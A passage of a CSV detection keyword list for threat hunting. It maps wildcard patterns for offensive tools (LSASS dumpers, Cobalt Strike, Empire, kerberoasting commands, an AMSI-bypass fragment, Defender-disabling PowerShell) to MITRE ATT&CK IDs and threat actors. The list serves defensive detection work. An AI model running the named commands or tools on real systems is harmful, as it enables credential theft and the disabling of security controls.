Evasion,https://github.com/govolution/avet,1,0,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*set_rpc_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_shellcode,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*set_svchost_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_wmi_callstack*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*set_wmiconfig \*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*setc_webshell*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*Set-DCShadowPermissions*,offensive_tool_keyword,AD exploitation cheat sheet,DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-DCShadowPermissions*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-DesktopACLToAllow*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Set-DomainObject*,offensive_tool_keyword,AD exploitation cheat sheet,Targeted kerberoasting by setting SPN,T1110,TA0006,N/A,N/A,Credential 
Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Seth by SySS GmbH*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*seth.py * -j INJECT*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,0,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*Seth-master.zip*,offensive_tool_keyword,Seth,Perform a MitM attack and extract clear text credentials from RDP connections,T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001,TA0006 ,N/A,N/A,Sniffing & Spoofing,https://github.com/SySS-Research/Seth,1,1,N/A,9,10,1296,343,2023-02-09T14:29:05Z,2017-03-10T15:46:38Z -*sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx'*,offensive_tool_keyword,AD exploitation cheat sheet,PowerShell AMSI Bypass Obfuscation example for copy-paste purposes,T1548 T1562 T1027,N/A,N/A,N/A,Defense Evasion,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*,greyware_tool_keyword,Excel,"prevent any warnings or alerts when Python functions are about to be executed. 
Threat actors could run malicious code through the new - Microsoft Excel feature that allows Python to run within the spreadsheet",T1112 - T1131 - T1204.002,TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml,1,0,N/A,7,1,88,10,2023-09-13T20:39:02Z,2022-01-11T07:34:37Z -*set-killdate *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Set-Killdate*,offensive_tool_keyword,empire,empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*setLoaderFlagZero*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*Set-MacAttribute.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1088,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Set-MpPreference -DisableIOAVProtection $true*,greyware_tool_keyword,powershell,Disable scanning all downloaded files and attachments,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableRealtimeMonitoring $true*,greyware_tool_keyword,powershell,Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.,T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableRealtimeMonitoring *true*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Set-MpPreference -DisableScriptScanning 1 *,greyware_tool_keyword,powershell,Disable AMSI (set to 0 to enable),T1562.001 - T1562.002 - T1070.004,TA0007 - TA0040 - TA0005,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,10,10,N/A,N/A,N/A,N/A -*Set-OabVirtualDirectory -ExternalUrl 'http*://*function Page_Load(){*}*,offensive_tool_keyword,ProxyShell,Microsoft Exchange Servers exploits - ProxyLogon and ProxyShell CVE-2021-27065 CVE-2021-34473 CVE-2021-34523 CVE-2021-31207,T1210.003 - T1190 - T1059.003 - T1059.001 - T1059.005 - T1505,TA0001 - TA0002 - TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation Tools,https://www.cert.ssi.gouv.fr/uploads/ANSSI_TLPWHITE_ProxyShell_ProxyLogon_Sigma_yml.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*setoolkit *,offensive_tool_keyword,social-engineer-toolkit,The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. 
SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec,T1566 - T1598,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/trustedsec/social-engineer-toolkit,1,0,N/A,N/A,10,9394,2569,2023-08-25T17:25:45Z,2012-12-31T22:01:33Z -*SetProcessInjection*encryptor.py*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,0,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*SetProcessInjection-main*,offensive_tool_keyword,SetProcessInjection,alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.,T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012,TA0005 - TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/OtterHacker/SetProcessInjection,1,1,N/A,9,1,53,10,2023-10-02T09:23:42Z,2023-10-02T08:21:47Z -*set-pushover-applicationtoken*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*set-pushover-userkeys*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy 
aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Set-RemotePSRemoting*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-RemoteWMI.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Set-ServiceBinPath*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*setspn -A HTTP/*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setspn -T medin -Q */*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setspn.exe -T medin -Q */*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 
- T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/nidem/kerberoast,1,0,N/A,N/A,10,1282,313,2022-12-31T17:17:28Z,2014-09-22T14:46:49Z -*setthreadcontext.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*setthreadcontext.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*Setting up GFlags & SilentProcessExit settings in registry?*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*setuid_setgid.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*setup_apfell.sh*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*setup_obfuscate_xor_key*,offensive_tool_keyword,cobaltstrike,A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/BokuLoader,1,1,N/A,10,10,1068,227,2023-09-08T10:09:19Z,2021-08-15T18:17:28Z -*setup_reflective_loader*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Set-WorkingHours*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - 